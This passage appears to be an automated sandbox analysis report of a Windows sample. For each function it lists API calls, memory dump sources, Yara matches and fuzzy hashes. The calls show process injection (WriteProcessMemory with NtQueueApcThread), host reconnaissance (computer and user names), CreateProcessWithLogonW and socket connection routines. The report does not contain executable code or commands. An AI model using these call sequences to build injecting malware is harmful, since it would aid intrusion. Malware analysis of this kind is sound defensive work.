                • API ID: __doserrno_errno_getptd_noexit$_invalid_parameter_noinfo
                • String ID:
                • API String ID: 388111225-0
                APIs
                • GetModuleHandleA.KERNEL32 ref: 038923F6
                • GetProcAddress.KERNEL32 ref: 03892406
                  • Part of subcall function 038922A8: malloc.LIBCMT ref: 038922E6
                  • Part of subcall function 038922A8: WriteProcessMemory.KERNEL32 ref: 03892354
                  • Part of subcall function 038922A8: free.LIBCMT ref: 0389236A
                • Thread32Next.KERNEL32 ref: 038924A2
                • Sleep.KERNEL32 ref: 038924B8
                • ReadProcessMemory.KERNEL32 ref: 038924D9
                • WriteProcessMemory.KERNEL32 ref: 0389250C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: MemoryProcess$Write$AddressHandleModuleNextProcReadSleepThread32freemalloc
                • String ID: NtQueueApcThread$ntdll
                • API String ID: 2421628550-1374908105
                APIs
                • _invalid_parameter_noinfo.LIBCMT ref: 038ADC36
                • _errno.LIBCMT ref: 038ADC2B
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: _errno_getptd_noexit_invalid_parameter_noinfo
                • String ID:
                • API String ID: 1812809483-0
                APIs
                  • Part of subcall function 0389E1A4: _mtinitlocknum.LIBCMT ref: 038A1C5E
                  • Part of subcall function 0389E1A4: _amsg_exit.LIBCMT ref: 038A1C6A
                • DecodePointer.KERNEL32 ref: 0389E218
                • DecodePointer.KERNEL32 ref: 0389E236
                • EncodePointer.KERNEL32 ref: 0389E264
                • DecodePointer.KERNEL32 ref: 0389E279
                • EncodePointer.KERNEL32 ref: 0389E284
                • DecodePointer.KERNEL32 ref: 0389E296
                • DecodePointer.KERNEL32 ref: 0389E2A6
                • __crtCorExitProcess.LIBCMT ref: 0389E32A
                • ExitProcess.KERNEL32 ref: 0389E332
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                Similarity
                • API ID: Pointer$Decode$EncodeExitProcess$__crt_amsg_exit_mtinitlocknum
                • String ID:
                • API String ID: 1550138920-0
                • Opcode ID: 0ef9eb6f061b4daf03fdf3e42c16e4d13342b6aff9f2cfcfd4baff68ba1b4b73
                • Instruction ID: 24f6125cf6b0d7d4fa011b319c6415238d160cf82fbe8bf1e7765e4cbafecd49
                • Opcode Fuzzy Hash: 0ef9eb6f061b4daf03fdf3e42c16e4d13342b6aff9f2cfcfd4baff68ba1b4b73
                • Instruction Fuzzy Hash: BB41B430216B4181FF55DF95F84431AA7A9B788BC4F4840AAF98E97B64DF38D555C300
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CurrentDuplicateHandleProcess$ErrorLast$AttributeProcThreadUpdate
                • String ID:
                • API String ID: 570851288-0
                • Opcode ID: dda4d696657d8428a178a4cccd50c6335780de972918c4e264b35949d0234b26
                • Instruction ID: adc124ffde97fb2508de39dd893c19ee6ed7d70e0d609ef5f28a31fa48b820c9
                • Opcode Fuzzy Hash: dda4d696657d8428a178a4cccd50c6335780de972918c4e264b35949d0234b26
                • Instruction Fuzzy Hash: BD416C72614B4187EB15DFA2E84435AB7A5F788BE8F0C41A9EE8987B55EF7CC205C700
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                • String ID:
                • API String ID: 3339321253-0
                • Opcode ID: 0621e14f71e2d88feb01d696d24d30253457c2253971658608e7fecda2256e50
                • Instruction ID: 3cb0a48504a21a123122eb319d094a30da3f159eddd4afbbc1e548bec916e64e
                • Opcode Fuzzy Hash: 0621e14f71e2d88feb01d696d24d30253457c2253971658608e7fecda2256e50
                • Instruction Fuzzy Hash: 7B314DA131478586EB25DF66E8443AFA365F744B9CF484165EE0A47B98DF3CC64AC700
                APIs
                • _errno.LIBCMT ref: 034A3766
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • __doserrno.LIBCMT ref: 034A375E
                  • Part of subcall function 0349EFA3: _getptd_noexit.LIBCMT ref: 0349EFA7
                • __lock_fhandle.LIBCMT ref: 034A37AA
                • _unlock_fhandle.LIBCMT ref: 034A37E4
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_unlock_fhandle
                • String ID:
                • API String ID: 2464146582-0
                • Opcode ID: 3fa3b4e4dc5e02bebeaf5fd051b8e84fdfa837920f3ab4cfb1f7d0eadf5e2d4a
                • Instruction ID: c9508a3b64f9b422acfcf13d4aeda361df70d0de680405bee9a8e77382b337c6
                • Opcode Fuzzy Hash: 3fa3b4e4dc5e02bebeaf5fd051b8e84fdfa837920f3ab4cfb1f7d0eadf5e2d4a
                • Instruction Fuzzy Hash: 26213A78A0CB004FF718EF6DE84133D7AD0DB95232F15424FD0168F295E7A45C4287AA
                APIs
                  • Part of subcall function 03895268: htonl.WS2_32 ref: 038952C5
                  • Part of subcall function 03895268: select.WS2_32 ref: 03895333
                  • Part of subcall function 03895268: __WSAFDIsSet.WS2_32 ref: 0389534B
                  • Part of subcall function 03895268: accept.WS2_32 ref: 03895368
                  • Part of subcall function 03895268: ioctlsocket.WS2_32 ref: 03895380
                  • Part of subcall function 03895268: __WSAFDIsSet.WS2_32 ref: 03895423
                • GetTickCount.KERNEL32 ref: 03895232
                  • Part of subcall function 038955B4: malloc.LIBCMT ref: 038955E6
                  • Part of subcall function 038955B4: htonl.WS2_32 ref: 03895619
                  • Part of subcall function 038955B4: recvfrom.WS2_32 ref: 0389565D
                  • Part of subcall function 038955B4: WSAGetLastError.WS2_32 ref: 0389566A
                • GetTickCount.KERNEL32 ref: 0389524A
                • GetTickCount.KERNEL32 ref: 03895768
                • GetTickCount.KERNEL32 ref: 0389577E
                • shutdown.WS2_32 ref: 0389579D
                • shutdown.WS2_32 ref: 038957B2
                • closesocket.WS2_32 ref: 038957BC
                • free.LIBCMT ref: 038957DC
                • free.LIBCMT ref: 038957F1
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: CountTick$freehtonlshutdown$ErrorLastacceptclosesocketioctlsocketmallocrecvfromselect
                • String ID:
                • API String ID: 3610715900-0
                • Opcode ID: 88e486cb06a14a5883469a77d23634fc32d297ebefc922b574edaf9e776b3f38
                • Instruction ID: be79057b9420319f282bf00756a9e22f731ca18da41939f3af1c055144ea4285
                • Opcode Fuzzy Hash: 88e486cb06a14a5883469a77d23634fc32d297ebefc922b574edaf9e776b3f38
                • Instruction Fuzzy Hash: 52217E76600702D6FF22DFB5E84432DA368F78AF88F1C81A2DE598A214DF34C685C751
                APIs
                • _errno.LIBCMT ref: 034A2F80
                  • Part of subcall function 0349F013: _getptd_noexit.LIBCMT ref: 0349F017
                • __doserrno.LIBCMT ref: 034A2F78
                  • Part of subcall function 0349EFA3: _getptd_noexit.LIBCMT ref: 0349EFA7
                • __lock_fhandle.LIBCMT ref: 034A2FC4
                • _close_nolock.LIBCMT ref: 034A2FD7
                • _unlock_fhandle.LIBCMT ref: 034A2FF0
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno_unlock_fhandle
                • String ID:
                • API String ID: 2140805544-0
                • Opcode ID: 0567908abb1da09094319a8f35060996f58827c2446b019697f467acd15fe284
                • Instruction ID: b99256bdf22f378ff6031c47794218817909fc9782e4d1abca20e4cb3f70b5b1
                • Opcode Fuzzy Hash: 0567908abb1da09094319a8f35060996f58827c2446b019697f467acd15fe284
                • Instruction Fuzzy Hash: 49115636509F004EE729EF6EDC903297A90EB51321F160A6FE017CF2E5D6F48841A3A9
                APIs
                • _errno.LIBCMT ref: 038A5AF3
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • __doserrno.LIBCMT ref: 038A5AEB
                  • Part of subcall function 0389FB5C: _getptd_noexit.LIBCMT ref: 0389FB60
                • __lock_fhandle.LIBCMT ref: 038A5B37
                • _lseeki64_nolock.LIBCMT ref: 038A5B50
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
                • String ID:
                • API String ID: 4140391395-0
                • Opcode ID: 56b34c18a28ca68a05c0e5a09bbf2d31e6e5b89d40deec44bc05dc379c93aa6f
                • Instruction ID: 3fd63e9a67bcd600e9923a7fd8430097724dd952afed6fe90c400f2ea500efa2
                • Opcode Fuzzy Hash: 56b34c18a28ca68a05c0e5a09bbf2d31e6e5b89d40deec44bc05dc379c93aa6f
                • Instruction Fuzzy Hash: ED11F372600B4445FA06EFADD81032D7A91A781BF3F0D5B959E79CB3D0CB7C84828726
                APIs
                • _errno.LIBCMT ref: 038A597B
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • __doserrno.LIBCMT ref: 038A5973
                  • Part of subcall function 0389FB5C: _getptd_noexit.LIBCMT ref: 0389FB60
                • __lock_fhandle.LIBCMT ref: 038A59BF
                • _lseek_nolock.LIBCMT ref: 038A59D8
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
                • String ID:
                • API String ID: 310312816-0
                • Opcode ID: 4833c2b8665bf31d984187e315fea37269f990f532a28b2b0e30fdfe739480cc
                • Instruction ID: 159f46d1b2721e86d20d8f1afdf31a913f940f25e388d167da58646becda43f6
                • Opcode Fuzzy Hash: 4833c2b8665bf31d984187e315fea37269f990f532a28b2b0e30fdfe739480cc
                • Instruction Fuzzy Hash: CB112472710B8045FB06EFEDE89032D7A51BB817A2F1D4596EA56CF390CBBC8481C722
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$_errno
                • String ID:
                • API String ID: 2288870239-0
                • Opcode ID: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
                • Instruction ID: 2f97f9cff8bba53cfdb7679f481c2c610c1b0b15a714157da057f0cbbf2db1ba
                • Opcode Fuzzy Hash: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
                • Instruction Fuzzy Hash: 31318D316A4E0A8FFFA4EB69E8D476976D1FB58326F58412F8009CB2A0DB6C8845C715
                APIs
                Strings
                • Mingw-w64 runtime failure:, xrefs: 00401D88
                • VirtualProtect failed with code 0x%x, xrefs: 00401F56
                • Address %p has no image-section, xrefs: 00401DC0
                • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                Memory Dump Source
                • Source File: 00000000.00000002.4094583277.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.4094558739.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094583277.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094629675.000000000040D000.00000080.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094651561.000000000040E000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.4094673415.000000000040F000.00000004.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_k2vUsu5VZ5.jbxd
                Similarity
                • API ID: QueryVirtual
                • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                • API String ID: 1804819252-1534286854
                • Opcode ID: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
                • Instruction ID: 10d76aa513752d408286ffc26ec959f6f169e193d9772deefbdc98a11bb0eab9
                • Opcode Fuzzy Hash: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
                • Instruction Fuzzy Hash: 2C51DFB2701B4086DB109F26E94475E77A1F799BA4F58423AEF98233E1EA3CC485C748
                APIs
                • _errno.LIBCMT ref: 038A431F
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • __doserrno.LIBCMT ref: 038A4317
                  • Part of subcall function 0389FB5C: _getptd_noexit.LIBCMT ref: 0389FB60
                • __lock_fhandle.LIBCMT ref: 038A4363
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
                • String ID:
                • API String ID: 2611593033-0
                • Opcode ID: 70799e69bd9062a04ea1f8efc400af3973f5b9fc7b5330ceef23c38fc380ada8
                • Instruction ID: 1551d53aca6ddb8c698eed60754b3e8c3a3291abfa45a8a450206b6938274bad
                • Opcode Fuzzy Hash: 70799e69bd9062a04ea1f8efc400af3973f5b9fc7b5330ceef23c38fc380ada8
                • Instruction Fuzzy Hash: 3A11E772710B8046FF06EFEEDC50B2D795167C0BA2F8949999B15CB390CBF88441C726
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
                • String ID:
                • API String ID: 2289611984-0
                • Opcode ID: 04127f76b53980034013af0f42a669dd87838fa1dff73494bf33a75188a75c24
                • Instruction ID: 066319820162dfbfc0b44e4574c6344d21d05853fbc2b3608c36f7fbbfb79821
                • Opcode Fuzzy Hash: 04127f76b53980034013af0f42a669dd87838fa1dff73494bf33a75188a75c24
                • Instruction Fuzzy Hash: 8E11B471700F4945F606EFEDD89832EBE54A780765F0D45A9DB15CB390DFB8C4418725
                APIs
                • _errno.LIBCMT ref: 038A3B39
                  • Part of subcall function 0389FBCC: _getptd_noexit.LIBCMT ref: 0389FBD0
                • __doserrno.LIBCMT ref: 038A3B31
                  • Part of subcall function 0389FB5C: _getptd_noexit.LIBCMT ref: 0389FB60
                • __lock_fhandle.LIBCMT ref: 038A3B7D
                • _close_nolock.LIBCMT ref: 038A3B90
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
                • String ID:
                • API String ID: 4060740672-0
                • Opcode ID: d703984814e996e83ed98980a5e84da43d7f727c49fba6facbc0338df0550374
                • Instruction ID: 6a5bc6991a318894a09ace495c8239e29d21766f56d31d4fdc7c257a73254f3a
                • Opcode Fuzzy Hash: d703984814e996e83ed98980a5e84da43d7f727c49fba6facbc0338df0550374
                • Instruction Fuzzy Hash: BD11EB76600B8455F705EFEDEC5031D7A92A780761F1D59E5CA19CF3D0CAF8C4428715
                APIs
                • malloc.LIBCMT ref: 03483AF0
                  • Part of subcall function 0349C60F: _FF_MSGBANNER.LIBCMT ref: 0349C63F
                  • Part of subcall function 0349C60F: _NMSG_WRITE.LIBCMT ref: 0349C649
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C67D
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C688
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C693
                • malloc.LIBCMT ref: 03483AFA
                  • Part of subcall function 0349C60F: _callnewh.LIBCMT ref: 0349C6A3
                  • Part of subcall function 0349C60F: _errno.LIBCMT ref: 0349C6A8
                • malloc.LIBCMT ref: 03483B05
                • free.LIBCMT ref: 03483CC5
                • free.LIBCMT ref: 03483CCD
                • free.LIBCMT ref: 03483CD5
                  • Part of subcall function 03484937: malloc.LIBCMT ref: 03484981
                  • Part of subcall function 03484937: malloc.LIBCMT ref: 0348498C
                  • Part of subcall function 03484937: free.LIBCMT ref: 03484A73
                  • Part of subcall function 03484937: free.LIBCMT ref: 03484A7B
                • free.LIBCMT ref: 03483CE1
                • free.LIBCMT ref: 03483CEE
                • free.LIBCMT ref: 03483CFB
                Memory Dump Source
                • Source File: 00000000.00000002.4095150845.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3480000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$malloc$_errno$_callnewh
                • String ID:
                • API String ID: 4160633307-0
                • Opcode ID: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
                • Instruction ID: f78647d4f074043de9276dbc9df5725663fd5a01215ffe67b5c17f12d480cfd0
                • Opcode Fuzzy Hash: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
                • Instruction Fuzzy Hash: E181B239318B094FDB29FF2D949167E77D5FB85A04F44025FD48ACB352EE20D803868A
                APIs
                • malloc.LIBCMT ref: 038846A9
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                • malloc.LIBCMT ref: 038846B3
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D25C
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D261
                • malloc.LIBCMT ref: 038846BE
                • free.LIBCMT ref: 0388487E
                • free.LIBCMT ref: 03884886
                • free.LIBCMT ref: 0388488E
                  • Part of subcall function 038854F0: malloc.LIBCMT ref: 0388553A
                  • Part of subcall function 038854F0: malloc.LIBCMT ref: 03885545
                  • Part of subcall function 038854F0: free.LIBCMT ref: 0388562C
                  • Part of subcall function 038854F0: free.LIBCMT ref: 03885634
                • free.LIBCMT ref: 0388489A
                • free.LIBCMT ref: 038848A7
                • free.LIBCMT ref: 038848B4
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: free$malloc$_errno$_callnewh$AllocHeap
                • String ID:
                • API String ID: 3534990644-0
                • Opcode ID: 6be82fb75818ba1ee7756e05d45c61c62cba93ed433390d031e696745eb28498
                • Instruction ID: 3c59542ea3fd0ee4e2317996c62ea49a548f3482db47e40d88885f520293e357
                • Opcode Fuzzy Hash: 6be82fb75818ba1ee7756e05d45c61c62cba93ed433390d031e696745eb28498
                • Instruction Fuzzy Hash: E66125277007C686DF20EBAB944076EB755F785BC8F484596CD469BB04DF38C50AC704
                APIs
                  • Part of subcall function 0389473C: malloc.LIBCMT ref: 03894758
                • malloc.LIBCMT ref: 03899AF0
                  • Part of subcall function 0389D1C8: _FF_MSGBANNER.LIBCMT ref: 0389D1F8
                  • Part of subcall function 0389D1C8: _NMSG_WRITE.LIBCMT ref: 0389D202
                  • Part of subcall function 0389D1C8: HeapAlloc.KERNEL32 ref: 0389D21D
                  • Part of subcall function 0389D1C8: _callnewh.LIBCMT ref: 0389D236
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D241
                  • Part of subcall function 0389D1C8: _errno.LIBCMT ref: 0389D24C
                  • Part of subcall function 0389CA38: malloc.LIBCMT ref: 0389CA88
                • GetComputerNameExA.KERNEL32 ref: 03899BB2
                • GetComputerNameA.KERNEL32 ref: 03899BE7
                • GetUserNameA.ADVAPI32 ref: 03899C1C
                  • Part of subcall function 0388EC4C: WSASocketA.WS2_32 ref: 0388EC7A
                • malloc.LIBCMT ref: 03899D35
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
                • String ID: VUUU
                • API String ID: 632458648-2040033107
                • Opcode ID: fbc643f024c366e196c72bb08a222e984ec50c02734afe1649aac117ff65b8a6
                • Instruction ID: cc3907236dd3e960fb7773dad34d8ebe05d81deb81132c988c3b9dc00ae9b7c6
                • Opcode Fuzzy Hash: fbc643f024c366e196c72bb08a222e984ec50c02734afe1649aac117ff65b8a6
                • Instruction Fuzzy Hash: E391162AB0079046FF15EBAAD8503AD67A5F785B84F8880ABDD49DB794DF3CC9468301
                APIs
                  • Part of subcall function 0389473C: malloc.LIBCMT ref: 03894758
                • GetStartupInfoA.KERNEL32 ref: 03890838
                  • Part of subcall function 0388FA80: MultiByteToWideChar.KERNEL32 ref: 0388FAAD
                  • Part of subcall function 0388FA80: MultiByteToWideChar.KERNEL32 ref: 0388FAD5
                • GetCurrentDirectoryW.KERNEL32 ref: 038908C5
                • GetCurrentDirectoryW.KERNEL32 ref: 038908D4
                • CreateProcessWithLogonW.ADVAPI32 ref: 0389092F
                • GetLastError.KERNEL32 ref: 03890939
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
                • String ID: %s as %s\%s: %d
                • API String ID: 3435635427-816037529
                • Opcode ID: 92d3955544a4728f5804b16fe6b589a6f18a28386c997154fca0a382d1a098e1
                • Instruction ID: bb65f062201474bf9a2acb80f89d1a1741ed178e2fa53f4fd89a996fcbd964ea
                • Opcode Fuzzy Hash: 92d3955544a4728f5804b16fe6b589a6f18a28386c997154fca0a382d1a098e1
                • Instruction Fuzzy Hash: B9518A76704B8186EB60DF5AF84074BB7A9F789B80F148166DF8997B28DF38C0068B40
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.4095284653.0000000003880000.00000040.00001000.00020000.00000000.sdmp, Offset: 03880000, based on PE: true
                • Associated: 00000000.00000002.4095284653.00000000038C5000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038C8000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038CC000.00000040.00001000.00020000.00000000.sdmp
                • Associated: 00000000.00000002.4095284653.00000000038D0000.00000040.00001000.00020000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3880000_k2vUsu5VZ5.jbxd
                Yara matches
                Similarity
                • API ID: Process$Memory$ErrorLastRead$CurrentWritefreemalloc
